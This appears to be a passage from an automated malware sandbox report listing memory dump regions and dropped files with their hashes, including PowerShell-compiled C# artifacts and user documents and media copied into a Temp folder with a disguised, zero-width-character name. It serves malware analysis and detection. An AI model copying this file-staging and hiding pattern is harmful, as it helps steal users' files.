memory/4164-186-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-178-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-188-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-192-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-187-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/2396-193-0x00000000060A0000-0x00000000060BE000-memory.dmp

memory/4700-194-0x00000000065E0000-0x000000000662C000-memory.dmp

memory/1400-201-0x00000000078D0000-0x0000000007966000-memory.dmp

memory/1400-202-0x0000000006DA0000-0x0000000006DBA000-memory.dmp

memory/1400-203-0x0000000006DF0000-0x0000000006E12000-memory.dmp

memory/1400-204-0x0000000007F20000-0x00000000084C4000-memory.dmp

memory/2396-205-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/4092-208-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/2696-219-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/4700-218-0x0000000006B30000-0x0000000006B4E000-memory.dmp

memory/4700-207-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/4092-206-0x00000000061D0000-0x0000000006202000-memory.dmp

memory/1400-238-0x0000000007A10000-0x0000000007AA2000-memory.dmp

memory/2696-239-0x0000000006CC0000-0x0000000006D63000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.cmdline

MD5 fdad626d96e36813218524401081cc52
SHA1 1b2b2c935cc2f156fd95af4fba6ee99634f239eb
SHA256 91043352a042ad0f61c7b699e37a88c80321dee3226984ac36d8a7ed1c39bf26
SHA512 03d91fc46b8863800166dfd202e8d0acde4add935d531a12f11e1ec0abaee2f067d399967c68d67b45fd02a11737c7cb084225b2cdacebc0b2a88ce926483c90

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

memory/2696-248-0x0000000006E40000-0x0000000006E4A000-memory.dmp

memory/4164-249-0x0000000075110000-0x0000000075620000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\CSCEA4EBACB51ED4AC78CEBE87F415E4A33.TMP

MD5 b2524129b6f8ca2398cde5a1a15a21cd
SHA1 413f84fff82a0764a52ed1b0ca519399c18ce121
SHA256 3c98318ae11050647731de61371aa1a65494614f3a2effe4425f5b44b2076234
SHA512 b3e84b841ed3795e6c2d13ab1f779e38a573788c0cef01cf375cc8bb924bd3c17d6ebecaaaa07f202482e89ea3934b9ea1458d392f41b44979d83c83a4c01a90

C:\Users\Admin\AppData\Local\Temp\RES4E4A.tmp

MD5 d55586a914733a5adff7e8523a4e4bb1
SHA1 e627c5228422b6ecbecafeb715479db466477e19
SHA256 661dde105de6e00dda8f8a6bd5c8a85d9e77581397a483a4807b810df77920e8
SHA512 c92d0f6a7d2bd646e9e560fe47b55ca1de99f050e00f9edfafca33dea3846a53dbd5a20e5b4e4795db07c4ce5d7fcfb468340515572a41dd01ce1a1513d09663

memory/2396-272-0x0000000006140000-0x0000000006148000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.dll

MD5 fe89629baa906371aadb85219d441583
SHA1 6bd586da202397d72722e254a6028a0f85f57cfc
SHA256 7a4083a0aec561f5a3ebfa0981cd0589a3aae2ebfc94dbe09a606ff08651f79f
SHA512 9d1f25b11758405fcece56758d4c3fae983a8c30dd724f730f445b010d94335f8d5c75b3141ce63331d5da735ad41af571b83fe7116ac3d1091befb092b92cfc

memory/4092-274-0x0000000007110000-0x0000000007121000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3e3d7d9b689e5506c773311c8791f7e3
SHA1 c34e72c1f7c104b4cb1514a6fa0995f6a100c99a
SHA256 5345d90e8c2f8b1f59c3d96c6d0ab00b85e8e72e61391c0aefac9cf71806d9e0
SHA512 4dde6d29b05867dac3ac3cbea6d2188814992e600ae536123e0f70956ed449ef914d5debb6695b1064eb825f1c14d3c89fe05354a74f743ef4c9b91ba6f224e0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 eedc851ccfb2e8281babb78c2f244c68
SHA1 4df05baf7c1b4f14aad3244aa30e95f234504eaf
SHA256 f8bb083f4072511a1b6c0c2e571a376fb678719fc20890ec96be851d25eaa790
SHA512 643d95f22f271d585f33609fefe30fd17b5b0380613553a86d1e94d5fb602660f2d4b7196915ac5e00f1d17702bbbecf9f4274f5dbb18820745a215b91cbc7ba

memory/4092-279-0x0000000007130000-0x000000000713E000-memory.dmp

memory/4092-281-0x0000000007140000-0x0000000007154000-memory.dmp

memory/2696-298-0x0000000007100000-0x000000000711A000-memory.dmp

memory/2696-303-0x00000000070F0000-0x00000000070F8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7c485a0c2f39466a7ed41ebda2d1d1a
SHA1 567dd25a9a2247b1dec0db09c9a54687cc35e7e8
SHA256 a68d7cb107944af7a82f1492f8e1077a282d705c732dadc91d8b1355db7085f6
SHA512 e90575427b4a869cf34328ce826ce6d357ee911dd065d60777aadf69123bd5a1ac21fc9a3663ed1ed5455d9cdc455967b275afded16a93f0810d2b82643ebdc8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2271126b2f9ce0cb98bb90504eb9bfcf
SHA1 7ca06f040e2fd666401d4770adb635f3dd7ee57f
SHA256 1e8742f064cf9159123a3657d28a194d70c07e56714d6413c606e4440929ccfc
SHA512 522978c8d4be996c9ba8688a2862af86b164cf1f427a2adcee7106acbc31ebd11b755fc6ffac7fd511ea7ff21b110f007b46884952af3d3f03536b973a06b29a

memory/4164-337-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-332-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-331-0x0000000075110000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 800e7254c9abfb250dd707f702e512ef
SHA1 685b831d0cc247a32647eb4c34693f607f54ae61
SHA256 d76bbb42e11c3102f5ca93591a6ecf2ee5a3e65d484f6833b5efda6b9e04f29b
SHA512 a03d9c7377b73d4941b458407903fc21facf2b20fa207b8f82d79e6fa9d72d318c1424a7d455adca7659653fcfab7ef6bcd8f4e198c1ee6e0f3d3fe9d4a0c8f4

memory/3464-357-0x0000000005740000-0x0000000005A94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\BackupUnblock.ppsm

MD5 58c541b82ecc938ba319c05d4dd010bb
SHA1 f3bd44cce07c580eecce41b17dfe82ea3534d756
SHA256 7fa83cdf495c78db552b5b87da6511263af39602b889c97a668ec7fb9b4fd2cf
SHA512 dae4aa23a63fe437fc16ccfc0334783e1be0c03bb7f9b06fedd5fa8fa9b0c658ab271fd1c7b4a6983f92edee274919e44ebb654648f8cba85c6f2197f5cfdeab

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\DenyStart.jpg

MD5 154f22ba50188383c12b2abca1d9615d
SHA1 5da7b17962d87141a6e718edad694c8a7dfffa93
SHA256 4cb4dcd39cffa5ef6a025dbabcca04789cb04e518933b34fe22e98f6bcc2d519
SHA512 c4e0f87156ba7ee196402df219dbd91e5c456f4af29038a9ff3d2cec3595587bd446901a6f05132c811c47018dcfe3ffc694ba5c33ab6f963b7baa4d1120ad79

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\InitializeRestart.jpeg

MD5 a37fef1d02fa95c5c4d0c806f7b33c3b
SHA1 6d2b02f8002ee7606d6b2a92f344af99f9473cb5
SHA256 2f4d282bc47a019402c82de1cdde5eae90d6a9f92362e2a66602bd4fc525a30e
SHA512 92769f396029a58800838bf5518a586b716748504c78cb4a4773da9f6b534ad699810fd0417f98106f1fc1f88c9d0447f1d4442bc008aa026200addfe3074a11

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\SetSubmit.mp3

MD5 0551711debc00a0d845cda07938eb846
SHA1 46e98fa784e22db4595209db6f95572e76f5f209
SHA256 9dda60a5679a8d76bb11f3cb1052418c407a9126f593e4e0d568d64d110a95ea
SHA512 1120c576bf2b8b05ab406e430e0025aacf16d5bc6fd376d6f48268413a8a5a88f002649631b4e5dba5672b98dfd806befd72dd89d798870bb1450cb4cd7b84c0

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\ApproveConfirm.csv

MD5 c5162387bf99ba422cf5bf48ff9f5898
SHA1 69a9803a7fc74807661223a0e6d269bc6d7712a1
SHA256 a17fbb9a0ecec9cfb8225223520da934de71b0bb45927a0d8d025caab7457900
SHA512 0b4b96a39f87f20e973d42328e6c3ee4f8efa6212bd78528ad1fe20bc34cebad67ac38a01ff4986d06a19d7435b7cd8c05f0c64d681dcfc6c54c733c0c59364c

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\CompareResume.docx

MD5 51ed2969fa98d1140c8958f82c28ce60
SHA1 d255c46b24f2c6d54ef6b81e95d41fa7a2271dca
SHA256 ef93c7dd41b7a2fae40eace3d1f248cf7332d29dca0f062fe4ba2b31bd65f3f8
SHA512 a5264657bce99d9e6d625613c6d06018aa796f727833ebcb9d0b0ddecd75bffda3763351ddbd64783f6bd93a638b157a5da84e75e2dd7e6e148d37931724d7f8

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\ShowProtect.doc

MD5 aa1b001d83a15073bdde3b501ce34e3f
SHA1 70b7155f88a41b0aed76eb4cd8c2a843432465ca
SHA256 a1c16c28b755a3a7eba42c716013d970ce6fd5467390903676a593c616c12076
SHA512 ecf1de16905c5fde8cbcfc294c401106b68bc8199d878be183bbcab5220526a8eb90746e872ec5c607bc84a959ca4b8947482bd384007eb133b3fe7f39fb4104

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Downloads\ConvertToExit.mp3

MD5 720a22a26820e1118e63351bc028532a
SHA1 0bb583197d9a07109fb49908fc89e898e6af214d
SHA256 90481a59394ff255c8d34a2114e7f0d09e1449138e7d1a1d844206c7891714ab
SHA512 99c6110352a722022a47ece5089de700f31dfbdb03944175ce074fb41686172d5147b8eb115ffe7e02a657aebbad4222e9bb43a14707f239d0be8469665c88d8

memory/2112-384-0x0000000005A70000-0x0000000005DC4000-memory.dmp

memory/4164-385-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-400-0x00000000032E0000-0x000000000366C000-memory.dmp

memory/4164-457-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-459-0x00000000750B0000-0x00000000750BD000-memory.dmp

memory/4164-467-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/4164-471-0x0000000074880000-0x0000000074998000-memory.dmp

memory/4164-470-0x00000000749A0000-0x00000000749AC000-memory.dmp

memory/4164-469-0x00000000749B0000-0x00000000749C0000-memory.dmp

memory/4164-468-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-466-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-465-0x0000000074E90000-0x0000000074E9C000-memory.dmp

memory/4164-464-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-463-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-462-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-461-0x0000000075060000-0x0000000075078000-memory.dmp

memory/4164-460-0x0000000075080000-0x00000000750A7000-memory.dmp

memory/4164-458-0x00000000750C0000-0x00000000750DE000-memory.dmp